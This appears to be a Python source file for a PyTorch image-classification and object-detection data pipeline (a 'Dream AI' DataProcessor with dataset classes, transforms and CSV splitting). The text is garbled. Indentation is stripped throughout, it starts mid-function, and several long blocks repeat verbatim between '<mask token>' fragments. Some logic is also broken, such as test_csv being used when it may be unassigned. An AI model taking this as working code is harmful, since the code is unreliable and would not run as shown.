tfms_temp = [resize_transform, transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224,
0.225])]
tfms_temp[1:1] = tfms
tfms = tfms_temp
print(tfms)
data_transforms = {self.tr_name: tfms, self.val_name: [transforms.
Resize(s), transforms.ToTensor(), transforms.Normalize([0.485,
0.456, 0.406], [0.229, 0.224, 0.225])], self.test_name: [
transforms.Resize(s), transforms.ToTensor(), transforms.
Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]}
temp_tfms = [resize_transform, transforms.ToTensor()]
temp_dataset = dataset(os.path.join(data_dir, self.tr_name),
data_dfs[self.tr_name], temp_tfms)
self.img_mean, self.img_std = get_img_stats(temp_dataset,
stats_percentage)
data_transforms[self.tr_name][-1].mean, data_transforms[self.tr_name][
-1].std = self.img_mean, self.img_std
data_transforms[self.val_name][-1].mean, data_transforms[self.val_name
][-1].std = self.img_mean, self.img_std
data_transforms[self.test_name][-1].mean, data_transforms[self.
test_name][-1].std = self.img_mean, self.img_std
if balance:
image_datasets = {x: dataset(os.path.join(data_dir, self.
tr_name), data_dfs[x], data_transforms[x], obj, minorities,
class_diffs, bal_tfms[x]) for x in [self.tr_name, self.
val_name, self.test_name]}
else:
image_datasets = {x: dataset(os.path.join(data_dir, self.
tr_name), data_dfs[x], data_transforms[x], obj) for x in [
self.tr_name, self.val_name, self.test_name]}
dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x],
batch_size=bs, shuffle=True, num_workers=num_workers) for x in
[self.tr_name, self.val_name, self.test_name]}
dataset_sizes = {x: len(image_datasets[x]) for x in [self.tr_name,
self.val_name, self.test_name]}
self.image_datasets, self.dataloaders, self.dataset_sizes = (
image_datasets, dataloaders, dataset_sizes)
return image_datasets, dataloaders, dataset_sizes
def imshow(self, inp, title=None):
"""Imshow for Tensor."""
inp = self.denorm_img(inp)
plt.imshow(inp)
if title:
plt.title(title)
plt.pause(0.001)
def denorm_img(self, inp, calculate=False):
inp = inp.numpy().transpose((1, 2, 0))
if calculate:
mean = np.mean(inp)
std = np.std(inp)
else:
mean = self.img_mean.numpy()
std = self.img_std.numpy()
inp = std * inp + mean
inp = np.clip(inp, 0, 1)
return inp
def show_data(self, folder_name='train', size=(64, 64), bs=5):
self.get_data(size, bs)
batch = next(iter(self.dataloaders[folder_name]))
inputs, classes = batch[0], batch[1]
out = torchvision.utils.make_grid(inputs)
if self.reg:
print(classes)
self.imshow(out, title=[x for x in classes])
elif self.multi_label:
self.imshow(out, title=[self.class_names[np.nonzero(x.type(
torch.LongTensor))] for x in classes])
else:
self.imshow(out, title=[self.class_names[x] for x in classes])
| <mask token>
class my_image_csv_dataset(Dataset):
def __init__(self, data_dir, data, transforms_=None, obj=False,
minorities=None, diffs=None, bal_tfms=None):
self.data_dir = data_dir
self.data = data
self.transforms_ = transforms_
self.tfms = None
self.obj = obj
self.minorities = minorities
self.diffs = diffs
self.bal_tfms = bal_tfms
assert transforms_ is not None, print('Please pass some transforms.')
def __len__(self):
return len(self.data)
def __getitem__(self, index):
img_path = os.path.join(self.data_dir, self.data.iloc[index, 0])
img = Image.open(img_path)
img = img.convert('RGB')
img = torchvision.transforms.functional.to_grayscale(img,
num_output_channels=3)
y = self.data.iloc[index, 1]
if self.minorities and self.bal_tfms:
if y in self.minorities:
if hasattr(self.bal_tfms, 'transforms'):
for tr in self.bal_tfms.transforms:
tr.p = self.diffs[y]
l = [self.bal_tfms]
l.extend(self.transforms_)
self.tfms = transforms.Compose(l)
else:
for t in self.bal_tfms:
t.p = self.diffs[y]
self.transforms_[1:1] = self.bal_tfms
self.tfms = transforms.Compose(self.transforms_)
else:
self.tfms = transforms.Compose(self.transforms_)
else:
self.tfms = transforms.Compose(self.transforms_)
x = self.tfms(img)
if self.obj:
s = x.size()[1]
if isinstance(s, tuple):
s = s[0]
row_scale = s / img.size[0]
col_scale = s / img.size[1]
y = rescale_bbox(y, row_scale, col_scale)
y.squeeze_()
y2 = self.data.iloc[index, 2]
y = y, y2
return x, y
class my_image_folder(DatasetFolder):
def __init__(self, root, transform=None, target_transform=None, loader=
default_loader, minorities=None, diffs=None, bal_tfms=None,
tta_tfms=None):
super(my_image_folder, self).__init__(root, loader, IMG_EXTENSIONS,
transform=transform, target_transform=target_transform)
self.imgs = self.samples
self.minorities = minorities
self.diffs = diffs
self.bal_tfms = bal_tfms
self.tta_tfms = tta_tfms
self.tfms = None
def __getitem__(self, index):
path, target = self.samples[index]
sample = self.loader(path)
if self.transform:
if self.minorities and self.bal_tfms:
if target in self.minorities:
if hasattr(self.bal_tfms, 'transforms'):
for tr in self.bal_tfms.transforms:
tr.p = self.diffs[target]
l = [self.bal_tfms]
l.extend(self.transform)
self.tfms = transforms.Compose(l)
else:
for t in self.bal_tfms:
t.p = self.diffs[target]
self.tfms = transforms.Compose(self.bal_tfms + self
.transform)
else:
self.tfms = transforms.Compose(self.transform)
elif self.tta_tfms:
self.tfms = self.tta_tfms
else:
self.tfms = transforms.Compose(self.transform)
sample = self.tfms(sample)
if self.target_transform:
target = self.target_transform(target)
return sample, target
<mask token>
def get_index(arr, a):
for i in range(len(arr)):
if sum(arr[i] == a) == len(a):
return i
return False
def rescale_bbox(bb, row_scale, col_scale):
bb = bb.reshape((-1, 4))
for b in bb:
r1, c1, r2, c2 = b
b[0] = int(np.round(r1 * col_scale))
b[1] = int(np.round(c1 * row_scale))
b[2] = int(np.round(r2 * col_scale))
b[3] = int(np.round(c2 * row_scale))
bb = bb.reshape((1, -1))
return bb
def get_img_stats(dataset, sz):
size = int(len(dataset) * sz)
i = 0
imgs = []
for img, _ in dataset:
if i > size:
break
imgs.append(img)
i += 1
imgs_ = torch.stack(imgs, dim=3)
imgs_ = imgs_.view(3, -1)
imgs_mean = imgs_.mean(dim=1)
imgs_std = imgs_.std(dim=1)
return imgs_mean, imgs_std
<mask token>
class DataProcessor:
def __init__(self, data_path=None, train_csv=None, val_csv=None, reg=
False, tr_name='train', val_name='val', test_name='test', extension
=None, setup_data=True):
print('+------------------------------------+')
print('| Dream AI |')
print('+------------------------------------+')
print()
self.device = torch.device('cuda:0' if torch.cuda.is_available() else
'cpu')
(self.data_path, self.train_csv, self.val_csv, self.reg, self.
tr_name, self.val_name, self.test_name, self.extension) = (
data_path, train_csv, val_csv, reg, tr_name, val_name,
test_name, extension)
self.obj = False
self.multi_label = False
if setup_data:
self.set_up_data()
def set_up_data(self, split_size=0.15):
data_path, train_csv, val_csv, tr_name, val_name, test_name = (self
.data_path, self.train_csv, self.val_csv, self.tr_name, self.
val_name, self.test_name)
if not data_path:
data_path = os.getcwd() + '/'
tr_path = os.path.join(data_path, tr_name)
val_path = os.path.join(data_path, val_name)
test_path = os.path.join(data_path, test_name)
if os.path.exists(os.path.join(data_path, tr_name + '.csv')):
train_csv = tr_name + '.csv'
if not train_csv:
print('no')
train_csv, val_csv, test_csv = self.data_from_paths_to_csv(
data_path, tr_path, val_path, test_path)
train_csv_path = os.path.join(data_path, train_csv)
train_df = pd.read_csv(train_csv_path)
if 'Unnamed: 0' in train_df.columns:
train_df = train_df.drop('Unnamed: 0', 1)
if len(train_df.columns) > 2:
self.obj = True
img_names = [str(x) for x in list(train_df.iloc[:, 0])]
if self.extension:
img_names = add_extension(img_names, self.extension)
if val_csv:
val_csv_path = os.path.join(data_path, val_csv)
val_df = pd.read_csv(val_csv_path)
val_targets = list(map(str, list(val_df.iloc[:, 1])))
if test_csv:
test_csv_path = os.path.join(data_path, test_csv)
test_df = pd.read_csv(test_csv_path)
test_targets = list(map(str, list(test_df.iloc[:, 1])))
targets = list(map(str, list(train_df.iloc[:, 1])))
lengths = [len(t) for t in [s.split() for s in targets]]
self.target_lengths = lengths
split_targets = [t.split() for t in targets]
if self.obj:
print('\nObject Detection\n')
int_targets = [list(map(float, x)) for x in split_targets]
zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)
for i, t in enumerate(zero_targets):
t[len(t) - len(int_targets[i]):] = int_targets[i]
zero_targets[i] = t
train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.
FloatTensor) for z in zero_targets]
obj_targets = list(map(str, list(train_df.iloc[:, 2])))
obj_split_targets = [t.split() for t in obj_targets]
try:
obj_split_targets = [list(map(int, x)) for x in
obj_split_targets]
except:
pass
dai_onehot, onehot_classes = one_hot(obj_split_targets, True)
c_names = list(onehot_classes)
class_idx = [[c_names.index(i) for i in c] for c in
obj_split_targets]
zero_idx = np.zeros((len(targets), max(lengths) // 4), dtype=int)
for i, t in enumerate(zero_idx):
t[len(t) - len(class_idx[i]):] = class_idx[i]
zero_idx[i] = t
train_df.iloc[:, 2] = [torch.from_numpy(z).type(torch.
LongTensor) for z in zero_idx]
self.data_dir, self.num_classes, self.class_names = data_path, len(
onehot_classes), onehot_classes
elif self.reg:
print('\nRegression\n')
int_targets = [list(map(int, x)) for x in split_targets]
zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)
for i, t in enumerate(zero_targets):
t[len(t) - len(int_targets[i]):] = int_targets[i]
zero_targets[i] = t
train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.
FloatTensor) for z in zero_targets]
self.data_dir, self.num_classes, self.class_names = data_path, max(
lengths), np.unique(zero_targets, axis=1)
elif lengths[1:] != lengths[:-1]:
self.multi_label = True
print('\nMulti-label Classification\n')
try:
split_targets = [list(map(int, x)) for x in split_targets]
except:
pass
dai_onehot, onehot_classes = one_hot(split_targets, self.
multi_label)
train_df.iloc[:, 1] = [torch.from_numpy(x).type(torch.
FloatTensor) for x in dai_onehot]
self.data_dir, self.num_classes, self.class_names = data_path, len(
onehot_classes), onehot_classes
else:
print('\nSingle-label Classification\n')
unique_targets = list(np.unique(targets))
target_ids = [unique_targets.index(x) for x in targets]
train_df.iloc[:, 1] = target_ids
if val_csv:
target_ids = [unique_targets.index(x) for x in val_targets]
val_df.iloc[:, 1] = target_ids
if test_csv:
target_ids = [unique_targets.index(x) for x in test_targets]
test_df.iloc[:, 1] = target_ids
self.data_dir, self.num_classes, self.class_names = data_path, len(
unique_targets), unique_targets
if not val_csv:
train_df, val_df = split_df(train_df, split_size)
if not test_csv:
val_df, test_df = split_df(val_df, split_size)
tr_images = [str(x) for x in list(train_df.iloc[:, 0])]
val_images = [str(x) for x in list(val_df.iloc[:, 0])]
test_images = [str(x) for x in list(test_df.iloc[:, 0])]
if self.extension:
tr_images = add_extension(tr_images, self.extension)
val_images = add_extension(val_images, self.extension)
test_images = add_extension(test_images, self.extension)
train_df.iloc[:, 0] = tr_images
val_df.iloc[:, 0] = val_images
test_df.iloc[:, 0] = test_images
train_df.to_csv(os.path.join(data_path, 'train.csv'), index=False)
val_df.to_csv(os.path.join(data_path, 'val.csv'), index=False)
test_df.to_csv(os.path.join(data_path, 'test.csv'), index=False)
self.minorities, self.class_diffs = None, None
if not self.obj or not self.multi_label:
self.minorities, self.class_diffs = get_minorities(train_df)
self.data_dfs = {self.tr_name: train_df, self.val_name: val_df,
self.test_name: test_df}
data_dict = {'data_dfs': self.data_dfs, 'data_dir': self.data_dir,
'num_classes': self.num_classes, 'class_names': self.
class_names, 'minorities': self.minorities, 'class_diffs': self
.class_diffs, 'obj': self.obj, 'multi_label': self.multi_label}
self.data_dict = data_dict
return data_dict
def data_from_paths_to_csv(self, data_path, tr_path, val_path=None,
test_path=None):
train_df = csv_from_path(tr_path, tr_path)
train_df.to_csv(os.path.join(data_path, self.tr_name + '.csv'),
index=False)
ret = self.tr_name + '.csv', None
if val_path is not None:
val_exists = os.path.exists(val_path)
if val_exists:
val_df = csv_from_path(val_path, tr_path)
val_df.to_csv(os.path.join(data_path, self.val_name +
'.csv'), index=False)
ret = self.tr_name + '.csv', self.val_name + '.csv'
if test_path is not None:
test_exists = os.path.exists(test_path)
if test_exists:
test_df = csv_from_path(test_path, tr_path)
test_df.to_csv(os.path.join(data_path, self.test_name +
'.csv'), index=False)
ret = (self.tr_name + '.csv', self.val_name + '.csv', self.
test_name + '.csv')
return ret
def get_data(self, data_dict=None, s=(224, 224), dataset=
my_image_csv_dataset, bs=32, balance=False, tfms=None, bal_tfms=
None, tta=False, num_workers=4, stats_percentage=0.6):
self.image_size = s
if not data_dict:
data_dict = self.data_dict
data_dfs, data_dir, minorities, class_diffs, obj, multi_label = (
data_dict['data_dfs'], data_dict['data_dir'], data_dict[
'minorities'], data_dict['class_diffs'], data_dict['obj'],
data_dict['multi_label'])
if obj or multi_label:
balance = False
if tta:
tta_tfms = {self.tr_name: transforms.Compose([transforms.
FiveCrop(s[0]), transforms.Lambda(lambda crops: torch.stack
([transforms.ToTensor()(crop) for crop in crops])),
transforms.Lambda(lambda crops: torch.stack([transforms.
Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(
crop) for crop in crops]))]), self.val_name: transforms.
Compose([transforms.FiveCrop(s[0]), transforms.Lambda(lambda
crops: torch.stack([transforms.ToTensor()(crop) for crop in
crops])), transforms.Lambda(lambda crops: torch.stack([
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224,
0.225])(crop) for crop in crops]))]), self.test_name:
transforms.Compose([transforms.FiveCrop(s[0]), transforms.
Lambda(lambda crops: torch.stack([transforms.ToTensor()(
crop) for crop in crops])), transforms.Lambda(lambda crops:
torch.stack([transforms.Normalize([0.485, 0.456, 0.406], [
0.229, 0.224, 0.225])(crop) for crop in crops]))])}
else:
tta_tfms = None
if not bal_tfms:
bal_tfms = {self.tr_name: [transforms.RandomHorizontalFlip()],
self.val_name: None, self.test_name: None}
else:
bal_tfms = {self.tr_name: bal_tfms, self.val_name: None, self.
test_name: None}
if obj:
resize_transform = transforms.Resize(s)
else:
resize_transform = transforms.Resize(s)
if not tfms:
tfms = [resize_transform, transforms.ToTensor(), transforms.
Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]
else:
tfms_temp = [resize_transform, transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224,
0.225])]
tfms_temp[1:1] = tfms
tfms = tfms_temp
print(tfms)
data_transforms = {self.tr_name: tfms, self.val_name: [transforms.
Resize(s), transforms.ToTensor(), transforms.Normalize([0.485,
0.456, 0.406], [0.229, 0.224, 0.225])], self.test_name: [
transforms.Resize(s), transforms.ToTensor(), transforms.
Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]}
temp_tfms = [resize_transform, transforms.ToTensor()]
temp_dataset = dataset(os.path.join(data_dir, self.tr_name),
data_dfs[self.tr_name], temp_tfms)
self.img_mean, self.img_std = get_img_stats(temp_dataset,
stats_percentage)
data_transforms[self.tr_name][-1].mean, data_transforms[self.tr_name][
-1].std = self.img_mean, self.img_std
data_transforms[self.val_name][-1].mean, data_transforms[self.val_name
][-1].std = self.img_mean, self.img_std
data_transforms[self.test_name][-1].mean, data_transforms[self.
test_name][-1].std = self.img_mean, self.img_std
if balance:
image_datasets = {x: dataset(os.path.join(data_dir, self.
tr_name), data_dfs[x], data_transforms[x], obj, minorities,
class_diffs, bal_tfms[x]) for x in [self.tr_name, self.
val_name, self.test_name]}
else:
image_datasets = {x: dataset(os.path.join(data_dir, self.
tr_name), data_dfs[x], data_transforms[x], obj) for x in [
self.tr_name, self.val_name, self.test_name]}
dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x],
batch_size=bs, shuffle=True, num_workers=num_workers) for x in
[self.tr_name, self.val_name, self.test_name]}
dataset_sizes = {x: len(image_datasets[x]) for x in [self.tr_name,
self.val_name, self.test_name]}
self.image_datasets, self.dataloaders, self.dataset_sizes = (
image_datasets, dataloaders, dataset_sizes)
return image_datasets, dataloaders, dataset_sizes
def imshow(self, inp, title=None):
"""Imshow for Tensor."""
inp = self.denorm_img(inp)
plt.imshow(inp)
if title:
plt.title(title)
plt.pause(0.001)
def denorm_img(self, inp, calculate=False):
inp = inp.numpy().transpose((1, 2, 0))
if calculate:
mean = np.mean(inp)
std = np.std(inp)
else:
mean = self.img_mean.numpy()
std = self.img_std.numpy()
inp = std * inp + mean
inp = np.clip(inp, 0, 1)
return inp
def show_data(self, folder_name='train', size=(64, 64), bs=5):
self.get_data(size, bs)
batch = next(iter(self.dataloaders[folder_name]))
inputs, classes = batch[0], batch[1]
out = torchvision.utils.make_grid(inputs)
if self.reg:
print(classes)
self.imshow(out, title=[x for x in classes])
elif self.multi_label:
self.imshow(out, title=[self.class_names[np.nonzero(x.type(
torch.LongTensor))] for x in classes])
else:
self.imshow(out, title=[self.class_names[x] for x in classes])
| <mask token>
class my_image_csv_dataset(Dataset):
def __init__(self, data_dir, data, transforms_=None, obj=False,
minorities=None, diffs=None, bal_tfms=None):
self.data_dir = data_dir
self.data = data
self.transforms_ = transforms_
self.tfms = None
self.obj = obj
self.minorities = minorities
self.diffs = diffs
self.bal_tfms = bal_tfms
assert transforms_ is not None, print('Please pass some transforms.')
def __len__(self):
return len(self.data)
def __getitem__(self, index):
img_path = os.path.join(self.data_dir, self.data.iloc[index, 0])
img = Image.open(img_path)
img = img.convert('RGB')
img = torchvision.transforms.functional.to_grayscale(img,
num_output_channels=3)
y = self.data.iloc[index, 1]
if self.minorities and self.bal_tfms:
if y in self.minorities:
if hasattr(self.bal_tfms, 'transforms'):
for tr in self.bal_tfms.transforms:
tr.p = self.diffs[y]
l = [self.bal_tfms]
l.extend(self.transforms_)
self.tfms = transforms.Compose(l)
else:
for t in self.bal_tfms:
t.p = self.diffs[y]
self.transforms_[1:1] = self.bal_tfms
self.tfms = transforms.Compose(self.transforms_)
else:
self.tfms = transforms.Compose(self.transforms_)
else:
self.tfms = transforms.Compose(self.transforms_)
x = self.tfms(img)
if self.obj:
s = x.size()[1]
if isinstance(s, tuple):
s = s[0]
row_scale = s / img.size[0]
col_scale = s / img.size[1]
y = rescale_bbox(y, row_scale, col_scale)
y.squeeze_()
y2 = self.data.iloc[index, 2]
y = y, y2
return x, y
class my_image_folder(DatasetFolder):
def __init__(self, root, transform=None, target_transform=None, loader=
default_loader, minorities=None, diffs=None, bal_tfms=None,
tta_tfms=None):
super(my_image_folder, self).__init__(root, loader, IMG_EXTENSIONS,
transform=transform, target_transform=target_transform)
self.imgs = self.samples
self.minorities = minorities
self.diffs = diffs
self.bal_tfms = bal_tfms
self.tta_tfms = tta_tfms
self.tfms = None
def __getitem__(self, index):
path, target = self.samples[index]
sample = self.loader(path)
if self.transform:
if self.minorities and self.bal_tfms:
if target in self.minorities:
if hasattr(self.bal_tfms, 'transforms'):
for tr in self.bal_tfms.transforms:
tr.p = self.diffs[target]
l = [self.bal_tfms]
l.extend(self.transform)
self.tfms = transforms.Compose(l)
else:
for t in self.bal_tfms:
t.p = self.diffs[target]
self.tfms = transforms.Compose(self.bal_tfms + self
.transform)
else:
self.tfms = transforms.Compose(self.transform)
elif self.tta_tfms:
self.tfms = self.tta_tfms
else:
self.tfms = transforms.Compose(self.transform)
sample = self.tfms(sample)
if self.target_transform:
target = self.target_transform(target)
return sample, target
<mask token>
def listdir_fullpath(d):
return [os.path.join(d, f) for f in os.listdir(d)]
<mask token>
def csv_from_path(path, img_dest):
path = Path(path)
img_dest = Path(img_dest)
labels_paths = list(path.iterdir())
tr_images = []
tr_labels = []
for l in labels_paths:
if l.is_dir():
for i in list(l.iterdir()):
if i.suffix in IMG_EXTENSIONS:
name = i.name
label = l.name
new_name = '{}_{}'.format(path.name, name)
new_path = img_dest / new_name
os.rename(i, new_path)
tr_images.append(new_name)
tr_labels.append(label)
tr_img_label = {'Img': tr_images, 'Label': tr_labels}
csv = pd.DataFrame(tr_img_label, columns=['Img', 'Label'])
csv = csv.sample(frac=1).reset_index(drop=True)
return csv
def add_extension(a, e):
a = [(x + e) for x in a]
return a
def one_hot(targets, multi=False):
if multi:
binerizer = MultiLabelBinarizer()
dai_1hot = binerizer.fit_transform(targets)
else:
binerizer = LabelBinarizer()
dai_1hot = binerizer.fit_transform(targets)
return dai_1hot, binerizer.classes_
def get_index(arr, a):
for i in range(len(arr)):
if sum(arr[i] == a) == len(a):
return i
return False
def rescale_bbox(bb, row_scale, col_scale):
bb = bb.reshape((-1, 4))
for b in bb:
r1, c1, r2, c2 = b
b[0] = int(np.round(r1 * col_scale))
b[1] = int(np.round(c1 * row_scale))
b[2] = int(np.round(r2 * col_scale))
b[3] = int(np.round(c2 * row_scale))
bb = bb.reshape((1, -1))
return bb
def get_img_stats(dataset, sz):
size = int(len(dataset) * sz)
i = 0
imgs = []
for img, _ in dataset:
if i > size:
break
imgs.append(img)
i += 1
imgs_ = torch.stack(imgs, dim=3)
imgs_ = imgs_.view(3, -1)
imgs_mean = imgs_.mean(dim=1)
imgs_std = imgs_.std(dim=1)
return imgs_mean, imgs_std
def split_df(train_df, test_size=0.15):
try:
train_df, val_df = train_test_split(train_df, test_size=test_size,
random_state=2, stratify=train_df.iloc[:, 1])
except:
train_df, val_df = train_test_split(train_df, test_size=test_size,
random_state=2)
train_df = train_df.reset_index(drop=True)
val_df = val_df.reset_index(drop=True)
return train_df, val_df
def save_obj(obj, path):
with open(path, 'wb') as f:
pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)
def load_obj(path):
with open(path, 'rb') as f:
return pickle.load(f)
class DataProcessor:
def __init__(self, data_path=None, train_csv=None, val_csv=None, reg=
False, tr_name='train', val_name='val', test_name='test', extension
=None, setup_data=True):
print('+------------------------------------+')
print('| Dream AI |')
print('+------------------------------------+')
print()
self.device = torch.device('cuda:0' if torch.cuda.is_available() else
'cpu')
(self.data_path, self.train_csv, self.val_csv, self.reg, self.
tr_name, self.val_name, self.test_name, self.extension) = (
data_path, train_csv, val_csv, reg, tr_name, val_name,
test_name, extension)
self.obj = False
self.multi_label = False
if setup_data:
self.set_up_data()
def set_up_data(self, split_size=0.15):
data_path, train_csv, val_csv, tr_name, val_name, test_name = (self
.data_path, self.train_csv, self.val_csv, self.tr_name, self.
val_name, self.test_name)
if not data_path:
data_path = os.getcwd() + '/'
tr_path = os.path.join(data_path, tr_name)
val_path = os.path.join(data_path, val_name)
test_path = os.path.join(data_path, test_name)
if os.path.exists(os.path.join(data_path, tr_name + '.csv')):
train_csv = tr_name + '.csv'
if not train_csv:
print('no')
train_csv, val_csv, test_csv = self.data_from_paths_to_csv(
data_path, tr_path, val_path, test_path)
train_csv_path = os.path.join(data_path, train_csv)
train_df = pd.read_csv(train_csv_path)
if 'Unnamed: 0' in train_df.columns:
train_df = train_df.drop('Unnamed: 0', 1)
if len(train_df.columns) > 2:
self.obj = True
img_names = [str(x) for x in list(train_df.iloc[:, 0])]
if self.extension:
img_names = add_extension(img_names, self.extension)
if val_csv:
val_csv_path = os.path.join(data_path, val_csv)
val_df = pd.read_csv(val_csv_path)
val_targets = list(map(str, list(val_df.iloc[:, 1])))
if test_csv:
test_csv_path = os.path.join(data_path, test_csv)
test_df = pd.read_csv(test_csv_path)
test_targets = list(map(str, list(test_df.iloc[:, 1])))
targets = list(map(str, list(train_df.iloc[:, 1])))
lengths = [len(t) for t in [s.split() for s in targets]]
self.target_lengths = lengths
split_targets = [t.split() for t in targets]
if self.obj:
print('\nObject Detection\n')
int_targets = [list(map(float, x)) for x in split_targets]
zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)
for i, t in enumerate(zero_targets):
t[len(t) - len(int_targets[i]):] = int_targets[i]
zero_targets[i] = t
train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.
FloatTensor) for z in zero_targets]
obj_targets = list(map(str, list(train_df.iloc[:, 2])))
obj_split_targets = [t.split() for t in obj_targets]
try:
obj_split_targets = [list(map(int, x)) for x in
obj_split_targets]
except:
pass
dai_onehot, onehot_classes = one_hot(obj_split_targets, True)
c_names = list(onehot_classes)
class_idx = [[c_names.index(i) for i in c] for c in
obj_split_targets]
zero_idx = np.zeros((len(targets), max(lengths) // 4), dtype=int)
for i, t in enumerate(zero_idx):
t[len(t) - len(class_idx[i]):] = class_idx[i]
zero_idx[i] = t
train_df.iloc[:, 2] = [torch.from_numpy(z).type(torch.
LongTensor) for z in zero_idx]
self.data_dir, self.num_classes, self.class_names = data_path, len(
onehot_classes), onehot_classes
elif self.reg:
print('\nRegression\n')
int_targets = [list(map(int, x)) for x in split_targets]
zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)
for i, t in enumerate(zero_targets):
t[len(t) - len(int_targets[i]):] = int_targets[i]
zero_targets[i] = t
train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.
FloatTensor) for z in zero_targets]
self.data_dir, self.num_classes, self.class_names = data_path, max(
lengths), np.unique(zero_targets, axis=1)
elif lengths[1:] != lengths[:-1]:
self.multi_label = True
print('\nMulti-label Classification\n')
try:
split_targets = [list(map(int, x)) for x in split_targets]
except:
pass
dai_onehot, onehot_classes = one_hot(split_targets, self.
multi_label)
train_df.iloc[:, 1] = [torch.from_numpy(x).type(torch.
FloatTensor) for x in dai_onehot]
self.data_dir, self.num_classes, self.class_names = data_path, len(
onehot_classes), onehot_classes
else:
print('\nSingle-label Classification\n')
unique_targets = list(np.unique(targets))
target_ids = [unique_targets.index(x) for x in targets]
train_df.iloc[:, 1] = target_ids
if val_csv:
target_ids = [unique_targets.index(x) for x in val_targets]
val_df.iloc[:, 1] = target_ids
if test_csv:
target_ids = [unique_targets.index(x) for x in test_targets]
test_df.iloc[:, 1] = target_ids
self.data_dir, self.num_classes, self.class_names = data_path, len(
unique_targets), unique_targets
if not val_csv:
train_df, val_df = split_df(train_df, split_size)
if not test_csv:
val_df, test_df = split_df(val_df, split_size)
tr_images = [str(x) for x in list(train_df.iloc[:, 0])]
val_images = [str(x) for x in list(val_df.iloc[:, 0])]
test_images = [str(x) for x in list(test_df.iloc[:, 0])]
if self.extension:
tr_images = add_extension(tr_images, self.extension)
val_images = add_extension(val_images, self.extension)
test_images = add_extension(test_images, self.extension)
train_df.iloc[:, 0] = tr_images
val_df.iloc[:, 0] = val_images
test_df.iloc[:, 0] = test_images
train_df.to_csv(os.path.join(data_path, 'train.csv'), index=False)
val_df.to_csv(os.path.join(data_path, 'val.csv'), index=False)
test_df.to_csv(os.path.join(data_path, 'test.csv'), index=False)
self.minorities, self.class_diffs = None, None
if not self.obj or not self.multi_label:
self.minorities, self.class_diffs = get_minorities(train_df)
self.data_dfs = {self.tr_name: train_df, self.val_name: val_df,
self.test_name: test_df}
data_dict = {'data_dfs': self.data_dfs, 'data_dir': self.data_dir,
'num_classes': self.num_classes, 'class_names': self.
class_names, 'minorities': self.minorities, 'class_diffs': self
.class_diffs, 'obj': self.obj, 'multi_label': self.multi_label}
self.data_dict = data_dict
return data_dict
def data_from_paths_to_csv(self, data_path, tr_path, val_path=None,
test_path=None):
train_df = csv_from_path(tr_path, tr_path)
train_df.to_csv(os.path.join(data_path, self.tr_name + '.csv'),
index=False)
ret = self.tr_name + '.csv', None
if val_path is not None:
val_exists = os.path.exists(val_path)
if val_exists:
val_df = csv_from_path(val_path, tr_path)
val_df.to_csv(os.path.join(data_path, self.val_name +
'.csv'), index=False)
ret = self.tr_name + '.csv', self.val_name + '.csv'
if test_path is not None:
test_exists = os.path.exists(test_path)
if test_exists:
test_df = csv_from_path(test_path, tr_path)
test_df.to_csv(os.path.join(data_path, self.test_name +
'.csv'), index=False)
ret = (self.tr_name + '.csv', self.val_name + '.csv', self.
test_name + '.csv')
return ret
def get_data(self, data_dict=None, s=(224, 224), dataset=
my_image_csv_dataset, bs=32, balance=False, tfms=None, bal_tfms=
None, tta=False, num_workers=4, stats_percentage=0.6):
self.image_size = s
if not data_dict:
data_dict = self.data_dict
data_dfs, data_dir, minorities, class_diffs, obj, multi_label = (
data_dict['data_dfs'], data_dict['data_dir'], data_dict[
'minorities'], data_dict['class_diffs'], data_dict['obj'],
data_dict['multi_label'])
if obj or multi_label:
balance = False
if tta:
tta_tfms = {self.tr_name: transforms.Compose([transforms.
FiveCrop(s[0]), transforms.Lambda(lambda crops: torch.stack
([transforms.ToTensor()(crop) for crop in crops])),
transforms.Lambda(lambda crops: torch.stack([transforms.
Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(
crop) for crop in crops]))]), self.val_name: transforms.
Compose([transforms.FiveCrop(s[0]), transforms.Lambda(lambda
crops: torch.stack([transforms.ToTensor()(crop) for crop in
crops])), transforms.Lambda(lambda crops: torch.stack([
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224,
0.225])(crop) for crop in crops]))]), self.test_name:
transforms.Compose([transforms.FiveCrop(s[0]), transforms.
Lambda(lambda crops: torch.stack([transforms.ToTensor()(
crop) for crop in crops])), transforms.Lambda(lambda crops:
torch.stack([transforms.Normalize([0.485, 0.456, 0.406], [
0.229, 0.224, 0.225])(crop) for crop in crops]))])}
else:
tta_tfms = None
if not bal_tfms:
bal_tfms = {self.tr_name: [transforms.RandomHorizontalFlip()],
self.val_name: None, self.test_name: None}
else:
bal_tfms = {self.tr_name: bal_tfms, self.val_name: None, self.
test_name: None}
if obj:
resize_transform = transforms.Resize(s)
else:
resize_transform = transforms.Resize(s)
if not tfms:
tfms = [resize_transform, transforms.ToTensor(), transforms.
Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]
else:
tfms_temp = [resize_transform, transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224,
0.225])]
tfms_temp[1:1] = tfms
tfms = tfms_temp
print(tfms)
data_transforms = {self.tr_name: tfms, self.val_name: [transforms.
Resize(s), transforms.ToTensor(), transforms.Normalize([0.485,
0.456, 0.406], [0.229, 0.224, 0.225])], self.test_name: [
transforms.Resize(s), transforms.ToTensor(), transforms.
Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]}
temp_tfms = [resize_transform, transforms.ToTensor()]
temp_dataset = dataset(os.path.join(data_dir, self.tr_name),
